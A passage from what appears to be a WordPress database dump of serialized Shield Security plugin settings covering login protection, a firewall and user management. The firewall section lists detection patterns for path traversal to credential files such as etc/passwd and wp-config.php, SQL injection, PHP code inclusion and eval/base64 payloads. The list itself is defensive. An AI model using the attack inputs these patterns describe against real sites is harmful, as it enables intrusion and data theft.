authentication.\";}i:8;a:10:{s:3:\"key\";s:18:\"email_any_user_set\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gj\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Allow Any User\";s:7:\"summary\";s:60:\"Allow Any User To Turn-On Two-Factor Authentication By Email\";s:11:\"description\";s:61:\"Allow Any User To Turn-On Two-Factor Authentication By Email.\";}i:9;a:10:{s:3:\"key\";s:24:\"bot_protection_locations\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:1:{i:0;s:5:\"login\";}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:5:\"login\";s:4:\"text\";s:5:\"Login\";}i:1;a:2:{s:9:\"value_key\";s:8:\"register\";s:4:\"text\";s:8:\"Register\";}i:2;a:2:{s:9:\"value_key\";s:8:\"password\";s:4:\"text\";s:13:\"Lost Password\";}i:3;a:2:{s:9:\"value_key\";s:12:\"checkout_woo\";s:4:\"text\";s:22:\"Checkout (WooCommerce)\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dv\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Protection Locations\";s:7:\"summary\";s:38:\"How Google reCAPTCHA Will Be Displayed\";s:11:\"description\";s:64:\"Choose for which forms bot protection measures will be deployed.\";}i:10;a:10:{s:3:\"key\";s:20:\"login_limit_interval\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:2:\"10\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/3q\";s:9:\"link_blog\";s:19:\"https://shsec.io/9o\";s:4:\"name\";s:23:\"Login Cooldown Interval\";s:7:\"summary\";s:39:\"Limit login attempts to every X seconds\";s:11:\"description\";s:109:\"WordPress will process only ONE login attempt for every number of seconds specified. Zero (0) turns this off.\";}i:11;a:9:{s:3:\"key\";s:23:\"enable_login_gasp_check\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3r\";s:9:\"link_blog\";s:19:\"https://shsec.io/9n\";s:4:\"name\";s:14:\"Bot Protection\";s:7:\"summary\";s:54:\"Protect WP Login From Automated Login Attempts By Bots\";s:11:\"description\";s:138:\"Adds a dynamically (Javascript) generated checkbox to the login form that prevents bots using automated login techniques. Recommended: ON.\";}i:12;a:10:{s:3:\"key\";s:29:\"enable_google_recaptcha_login\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:2;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:3;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:4;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/9m\";s:9:\"link_blog\";s:22:\"https://shsec.io/shld5\";s:4:\"name\";s:16:\"Google reCAPTCHA\";s:7:\"summary\";s:23:\"Enable Google reCAPTCHA\";s:11:\"description\";s:41:\"Use Google reCAPTCHA on the login screen.\";}i:13;a:10:{s:3:\"key\";s:17:\"enable_antibot_js\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dw\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"AntiBot JS\";s:7:\"summary\";s:42:\"Load Anti-Bot JS For 3rd Party Login Forms\";s:11:\"description\";s:79:\"Important: This is experimental. Please contact support for further assistance.\";}i:14;a:9:{s:3:\"key\";s:16:\"antibot_form_ids\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:2:{i:0;s:19:\"form#ihc_login_form\";i:1;s:15:\"form#createuser\";}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"AntiBot Forms\";s:7:\"summary\";s:66:\"Enter The IDs Of The 3rd Party Login Forms For Use With AntiBot JS\";s:11:\"description\";s:32:\"For Use With AnitBot JS (above).\";}i:15;a:9:{s:3:\"key\";s:14:\"enable_yubikey\";s:7:\"section\";s:30:\"section_yubikey_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4f\";s:9:\"link_blog\";s:19:\"https://shsec.io/9t\";s:4:\"name\";s:29:\"Enable Yubikey Authentication\";s:7:\"summary\";s:49:\"Turn On / Off Yubikey Authentication On This Site\";s:11:\"description\";s:99:\"Combined with your Yubikey API Key (below) this will form the basis of your Yubikey Authentication.\";}i:16;a:10:{s:3:\"key\";s:14:\"yubikey_app_id\";s:7:\"section\";s:30:\"section_yubikey_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/4g\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Yubikey App ID\";s:7:\"summary\";s:26:\"Your Unique Yubikey App ID\";s:11:\"description\";s:91:\"Combined with your Yubikey API Key this will form the basis of your Yubikey Authentication.\";}i:17;a:10:{s:3:\"key\";s:15:\"yubikey_api_key\";s:7:\"section\";s:30:\"section_yubikey_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/4g\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Yubikey API Key\";s:7:\"summary\";s:31:\"Your Unique Yubikey App API Key\";s:11:\"description\";s:90:\"Combined with your Yubikey App ID this will form the basis of your Yubikey Authentication.\";}i:18;a:11:{s:3:\"key\";s:13:\"text_imahuman\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"GASP Checkbox Text\";s:7:\"summary\";s:47:\"The Message Displayed Next To The GASP Checkbox\";s:11:\"description\";s:99:\"You can change the text displayed to the user beside the checkbox if you need a customized message.\";}i:19;a:11:{s:3:\"key\";s:19:\"text_pleasecheckbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"GASP Alert Text\";s:7:\"summary\";s:55:\"The Message Displayed If The User Doesn\'t Check The Box\";s:11:\"description\";s:95:\"You can change the text displayed to the user in the alert message if they don\'t check the box.\";}i:20;a:6:{s:3:\"key\";s:26:\"email_can_send_verified_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;}i:21;a:6:{s:3:\"key\";s:8:\"gasp_key\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:22;a:6:{s:3:\"key\";s:21:\"two_factor_secret_key\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:23;a:5:{s:3:\"key\";s:21:\"use_login_intent_page\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:5:\"value\";b:1;}}s:11:\"definitions\";a:2:{s:20:\"login_intent_timeout\";i:5;s:6:\"events\";a:16:{s:23:\"2fa_backupcode_verified\";a:0:{}s:19:\"2fa_backupcode_fail\";a:1:{s:7:\"offense\";b:1;}s:18:\"2fa_email_verified\";a:0:{}s:21:\"2fa_email_verify_fail\";a:1:{s:7:\"offense\";b:1;}s:23:\"2fa_googleauth_verified\";a:0:{}s:15:\"2fa_google_fail\";a:1:{s:7:\"offense\";b:1;}s:20:\"2fa_yubikey_verified\";a:0:{}s:16:\"2fa_yubikey_fail\";a:1:{s:7:\"offense\";b:1;}s:22:\"2fa_email_send_success\";a:0:{}s:19:\"2fa_email_send_fail\";a:0:{}s:13:\"cooldown_fail\";a:0:{}s:13:\"honeypot_fail\";a:0:{}s:11:\"botbox_fail\";a:0:{}s:11:\"login_block\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:14:\"hide_login_url\";a:1:{s:5:\"audit\";b:0;}s:11:\"2fa_success\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334242,'shield_mod_config_4f3897fc7716980bb47f6d5f7775f666','a:6:{s:4:\"slug\";s:8:\"firewall\";s:10:\"properties\";a:13:{s:4:\"slug\";s:8:\"firewall\";s:4:\"name\";s:8:\"Firewall\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"firewall\";s:7:\"tagline\";s:61:\"Automatically block malicious URLs and data sent to your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:30;}s:8:\"sections\";a:6:{i:0;a:5:{s:4:\"slug\";s:33:\"section_firewall_blocking_options\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"Firewall Blocking Options\";s:11:\"title_short\";s:17:\"Firewall Blocking\";s:7:\"summary\";a:2:{i:0;s:56:\"Here you choose what kind of malicious data to scan for.\";i:1;s:198:\"Recommendation - Turn on as many options here as you can. If you find an incompatibility or something stops working, un-check 1 option at a time until you find the problem or review the Audit Trail.\";}}i:1;a:4:{s:4:\"slug\";s:38:\"section_choose_firewall_block_response\";s:5:\"title\";s:30:\"Choose Firewall Block Response\";s:11:\"title_short\";s:17:\"Firewall Response\";s:7:\"summary\";a:2:{i:0;s:75:\"Here you choose how the plugin will respond when it detects malicious data.\";i:1;s:54:\"Recommendation - Choose the option \'Die With Message\'.\";}}i:2;a:4:{s:4:\"slug\";s:17:\"section_whitelist\";s:5:\"title\";s:72:\"Whitelists - IPs, Pages, Parameters, and Users that by-pass the Firewall\";s:11:\"title_short\";s:9:\"Whitelist\";s:7:\"summary\";a:2:{i:0;s:124:\"In principle you should not need to whitelist anything or anyone unless you have discovered a collision with another plugin.\";i:1;s:90:\"Recommendation - Do not whitelist anything unless you are confident in what you are doing.\";}}i:3;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:4;a:4:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:5:\"title\";s:23:\"Enable Module: Firewall\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:123:\"Purpose - The Firewall is designed to analyse data sent to your website and block any requests that appear to be malicious.\";i:1;s:53:\"Recommendation - Keep the Firewall feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:15:{i:0;a:9:{s:3:\"key\";s:15:\"enable_firewall\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/43\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf01\";s:4:\"name\";s:15:\"Enable Firewall\";s:7:\"summary\";s:39:\"Enable (or Disable) The Firewall module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Firewall module\";}i:1;a:9:{s:3:\"key\";s:21:\"include_cookie_checks\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Include Cookies\";s:7:\"summary\";s:41:\"Also Test Cookie Values In Firewall Tests\";s:11:\"description\";s:95:\"The firewall tests GET and POST, but with this option checked it will also check COOKIE values.\";}i:2;a:9:{s:3:\"key\";s:19:\"block_dir_traversal\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Directory Traversals\";s:7:\"summary\";s:26:\"Block Directory Traversals\";s:11:\"description\";s:71:\"This will block directory traversal paths in in application parameters.\";}i:3;a:9:{s:3:\"key\";s:17:\"block_sql_queries\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"SQL Queries\";s:7:\"summary\";s:17:\"Block SQL Queries\";s:11:\"description\";s:46:\"This will block SQL in application parameters.\";}i:4;a:9:{s:3:\"key\";s:21:\"block_wordpress_terms\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"WordPress Terms\";s:7:\"summary\";s:30:\"Block WordPress Specific Terms\";s:11:\"description\";s:91:\"This will block WordPress specific terms in application parameters (wp_, user_login, etc.).\";}i:5;a:9:{s:3:\"key\";s:22:\"block_field_truncation\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Field Truncation\";s:7:\"summary\";s:30:\"Block Field Truncation Attacks\";s:11:\"description\";s:66:\"This will block field truncation attacks in application parameters\";}i:6;a:9:{s:3:\"key\";s:14:\"block_php_code\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"PHP Code\";s:7:\"summary\";s:23:\"Block PHP Code Includes\";s:11:\"description\";s:132:\"This will block any data that appears to try and include PHP files. Will probably block saving within the Plugin/Theme file editors.\";}i:7;a:9:{s:3:\"key\";s:22:\"block_exe_file_uploads\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Exe File Uploads\";s:7:\"summary\";s:29:\"Block Executable File Uploads\";s:11:\"description\";s:59:\"This will block executable file uploads (.php, .exe, etc.).\";}i:8;a:9:{s:3:\"key\";s:20:\"block_leading_schema\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Leading Schemas\";s:7:\"summary\";s:36:\"Block Leading Schemas (HTTPS / HTTP)\";s:11:\"description\";s:135:\"This will block leading schemas http:// and https:// in application parameters (off by default; may cause problems with other plugins).\";}i:9;a:9:{s:3:\"key\";s:16:\"block_aggressive\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Aggressive Scan\";s:7:\"summary\";s:23:\"Aggressively Block Data\";s:11:\"description\";s:159:\"Employs a set of aggressive rules to detect and block malicious data submitted to your site. Warning - May cause an increase in false-positive firewall blocks.\";}i:10;a:10:{s:3:\"key\";s:14:\"block_response\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:7:\"default\";s:20:\"redirect_die_message\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:20:\"redirect_die_message\";s:4:\"text\";s:16:\"Die With Message\";}i:1;a:2:{s:9:\"value_key\";s:12:\"redirect_die\";s:4:\"text\";s:3:\"Die\";}i:2;a:2:{s:9:\"value_key\";s:13:\"redirect_home\";s:4:\"text\";s:21:\"Redirect To Home Page\";}i:3;a:2:{s:9:\"value_key\";s:12:\"redirect_404\";s:4:\"text\";s:10:\"Return 404\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Block Response\";s:7:\"summary\";s:50:\"How the firewall responds when it blocks a request\";s:11:\"description\";s:100:\"We recommend dying with a message so you know what might have occurred when the firewall blocks you.\";}i:11;a:9:{s:3:\"key\";s:16:\"block_send_email\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Email Report\";s:7:\"summary\";s:89:\"When a visitor is blocked the firewall will send an email to the configured email address\";s:11:\"description\";s:124:\"Use with caution - if you get hit by automated bots you may send out too many emails and you could get blocked by your host.\";}i:12;a:9:{s:3:\"key\";s:21:\"page_params_whitelist\";s:7:\"section\";s:17:\"section_whitelist\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:21:\"comma_separated_lists\";s:9:\"link_info\";s:19:\"https://shsec.io/2a\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Whitelist Parameters\";s:7:\"summary\";s:74:\"Detail pages and parameters that are whitelisted (ignored by the firewall)\";s:11:\"description\";s:104:\"This should be used with caution and you should only provide parameter names that you must have excluded\";}i:13;a:9:{s:3:\"key\";s:16:\"whitelist_admins\";s:7:\"section\";s:17:\"section_whitelist\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Ignore Administrators\";s:7:\"summary\";s:21:\"Ignore Administrators\";s:11:\"description\";s:78:\"Authenticated administrator users will not be processed by the firewall rules.\";}i:14;a:11:{s:3:\"key\";s:16:\"text_firewalldie\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Firewall Block Message\";s:7:\"summary\";s:63:\"Message Displayed To Visitor When A Firewall Block Is Triggered\";s:11:\"description\";s:102:\"When you select the option to display a message to the visitor, this is the message that is displayed.\";}}s:11:\"definitions\";a:3:{s:17:\"default_whitelist\";a:14:{s:29:\"/wp-admin/options-general.php\";a:0:{}s:21:\"/wp-admin/options.php\";a:2:{i:0;s:4:\"home\";i:1;s:7:\"siteurl\";}s:21:\"/wp-admin/plugins.php\";a:1:{i:0;s:6:\"plugin\";}s:22:\"/wp-admin/post-new.php\";a:0:{}s:22:\"/wp-admin/page-new.php\";a:0:{}s:22:\"/wp-admin/link-add.php\";a:0:{}s:26:\"/wp-admin/media-upload.php\";a:0:{}s:19:\"/wp-admin/admin.php\";a:1:{i:0;s:4:\"page\";}s:18:\"/wp-admin/post.php\";a:1:{i:0;s:7:\"content\";}s:27:\"/wp-admin/plugin-editor.php\";a:1:{i:0;s:10:\"newcontent\";}s:18:\"/wp-admin/page.php\";a:0:{}s:24:\"/wp-admin/admin-ajax.php\";a:0:{}s:21:\"/wp-comments-post.php\";a:2:{i:0;s:3:\"url\";i:1;s:7:\"comment\";}s:1:\"*\";a:21:{i:0;s:12:\"affwp_action\";i:1;s:7:\"ajaxurl\";i:2;s:20:\"g-recaptcha-response\";i:3;s:11:\"verify_sign\";i:4;s:6:\"txn_id\";i:5;s:15:\"wp_http_referer\";i:6;s:16:\"_wp_http_referer\";i:7;s:25:\"_wp_original_http_referer\";i:8;s:11:\"JCS_INENREF\";i:9;s:5:\"pass1\";i:10;s:10:\"pass1-text\";i:11;s:3:\"pwd\";i:12;s:3:\"url\";i:13;s:10:\"referredby\";i:14;s:11:\"redirect_to\";i:15;s:28:\"jetpack_sso_original_request\";i:16;s:23:\"jetpack_sso_redirect_to\";i:17;s:33:\"/^wordpress_logged_in_[0-9a-f]+$/\";i:18;s:10:\"edd_action\";i:19;s:12:\"edd_redirect\";i:20;s:10:\"wpcf7-form\";}}s:17:\"firewall_patterns\";a:8:{s:12:\"dirtraversal\";a:1:{s:6:\"simple\";a:8:{i:0;s:10:\"etc/passwd\";i:1;s:17:\"proc/self/environ\";i:2;s:10:\"etc/passwd\";i:3;s:8:\"makefile\";i:4;s:7:\"wwwroot\";i:5;s:10:\"pingserver\";i:6;s:3:\"../\";i:7;s:8:\"loopback\";}}s:7:\"wpterms\";a:2:{s:6:\"simple\";a:2:{i:0;s:4:\"/**/\";i:1;s:13:\"wp-config.php\";}s:5:\"regex\";a:3:{i:0;s:4:\"^wp_\";i:1;s:11:\"^user_login\";i:2;s:10:\"^user_pass\";}}s:15:\"fieldtruncation\";a:1:{s:5:\"regex\";a:2:{i:0;s:7:\"\\s{49,}\";i:1;s:4:\"\\x00\";}}s:10:\"sqlqueries\";a:1:{s:5:\"regex\";a:3:{i:0;s:11:\"concat\\s*\\(\";i:1;s:12:\"group_concat\";i:2;s:13:\"union.*select\";}}s:7:\"exefile\";a:1:{s:5:\"regex\";a:1:{i:0;s:86:\"\\.(dll|rb|py|exe|php[3-6]?|pl|perl|ph[34]|phl|phtml|phtm|sql|ini|jsp|asp|git|svn|tar)$\";}}s:6:\"schema\";a:2:{s:6:\"simple\";a:1:{i:0;s:6:\".shtml\";}s:5:\"regex\";a:1:{i:0;s:23:\"^(http|https|ftp|file):\";}}s:7:\"phpcode\";a:2:{s:6:\"simple\";N;s:5:\"regex\";a:1:{i:0;s:52:\"(include|include_once|require|require_once)\\s*\\(.*\\)\";}}s:10:\"aggressive\";a:2:{s:6:\"simple\";a:11:{i:0;s:5:\"eval(\";i:1;s:6:\"(null)\";i:2;s:7:\"base64_\";i:3;s:9:\"localhost\";i:4;s:10:\"(function(\";i:5;s:8:\"{x.html(\";i:6;s:7:\").html(\";i:7;s:3:\"...\";i:8;s:10:\"/httpdocs/\";i:9;s:5:\"/tmp/\";i:10;s:8:\"boot.ini\";}s:5:\"regex\";a:5:{i:0;s:16:\"GLOBALS(=|\\[|%%)\";i:1;s:16:\"REQUEST(=|\\[|%%)\";i:2;s:24:\"(`|\\<|\\>|\\[|\\]|\\{|\\}|\\?)\";i:3;s:32:\"drop\\s+table\\s+(`|\'?)[a-z0-9]+\\1\";i:4;s:53:\"\'\\s+OR\\s+\'([a-z0-9]+)\'\\s*=\\s*\'\\1\'\\s+(--|\\(\\{|\\/\\*)\\s+\";}}}s:6:\"events\";a:12:{s:10:\"check_skip\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}s:14:\"firewall_block\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:23:\"blockparam_dirtraversal\";a:1:{s:3:\"cat\";i:3;}s:18:\"blockparam_wpterms\";a:1:{s:3:\"cat\";i:3;}s:26:\"blockparam_fieldtruncation\";a:1:{s:3:\"cat\";i:3;}s:21:\"blockparam_sqlqueries\";a:1:{s:3:\"cat\";i:3;}s:17:\"blockparam_schema\";a:1:{s:3:\"cat\";i:3;}s:21:\"blockparam_aggressive\";a:1:{s:3:\"cat\";i:3;}s:18:\"blockparam_phpcode\";a:1:{s:3:\"cat\";i:3;}s:13:\"block_exefile\";a:1:{s:3:\"cat\";i:3;}s:13:\"fw_email_fail\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}s:16:\"fw_email_success\";a:1:{s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334243,'shield_mod_config_885d1a70f7f09058cecb2ace25fc7e24','a:6:{s:4:\"slug\";s:15:\"user_management\";s:10:\"properties\";a:12:{s:4:\"name\";s:15:\"User Management\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:15:\"user_management\";s:7:\"tagline\";s:61:\"Control user sessions, duration, timeouts and account sharing\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:8:\"sections\";a:7:{i:0;a:5:{s:4:\"slug\";s:31:\"section_user_session_management\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"User Session Management\";s:11:\"title_short\";s:15:\"Session Options\";s:7:\"summary\";a:2:{i:0;s:119:\"Purpose - Allows you to better control user sessions on your site and expire idle sessions and prevent account sharing.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:4:{s:4:\"slug\";s:16:\"section_user_reg\";s:5:\"title\";s:17:\"User Registration\";s:11:\"title_short\";s:17:\"User Registration\";s:7:\"summary\";a:2:{i:0;s:53:\"Purpose - Control user registration and prevent SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:2;a:5:{s:4:\"slug\";s:17:\"section_passwords\";s:4:\"reqs\";a:1:{s:6:\"wp_min\";s:3:\"4.4\";}s:5:\"title\";s:17:\"Password Policies\";s:11:\"title_short\";s:17:\"Password Policies\";s:7:\"summary\";a:2:{i:0;s:69:\"Purpose - Have full control over passwords used by users on the site.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:3;a:4:{s:4:\"slug\";s:15:\"section_suspend\";s:5:\"title\";s:36:\"Automatic And Manual User Suspension\";s:11:\"title_short\";s:15:\"User Suspension\";s:7:\"summary\";a:2:{i:0;s:75:\"Purpose - Automatically suspend accounts to prevent login by certain users.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:4;a:4:{s:4:\"slug\";s:32:\"section_admin_login_notification\";s:5:\"title\";s:24:\"Admin Login Notification\";s:11:\"title_short\";s:13:\"Notifications\";s:7:\"summary\";a:2:{i:0;s:125:\"Purpose - So you can be made aware of when a WordPress administrator has logged into your site when you are not expecting it.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:5;a:4:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:5:\"title\";s:30:\"Enable Module: User Management\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:148:\"Purpose - User Management offers real user sessions, finer control over user session time-out, and ensures users have logged-in in a correct manner.\";i:1;s:60:\"Recommendation - Keep the User Management feature turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{i:0;a:9:{s:3:\"key\";s:22:\"enable_user_management\";s:7:\"section\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e3\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Enable User Management\";s:7:\"summary\";s:46:\"Enable (or Disable) The User Management module\";s:11:\"description\";s:74:\"Un-Checking this option will completely disable the User Management module\";}i:1;a:11:{s:3:\"key\";s:36:\"enable_user_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:7:\"premium\";b:1;s:9:\"sensitive\";b:0;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e2\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:29:\"User Login Notification Email\";s:7:\"summary\";s:58:\"Send Email Notification To Each User Upon Successful Login\";s:11:\"description\";s:85:\"A notification is sent to each user when a successful login occurs for their account.\";}i:2;a:10:{s:3:\"key\";s:37:\"enable_admin_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Admin Login 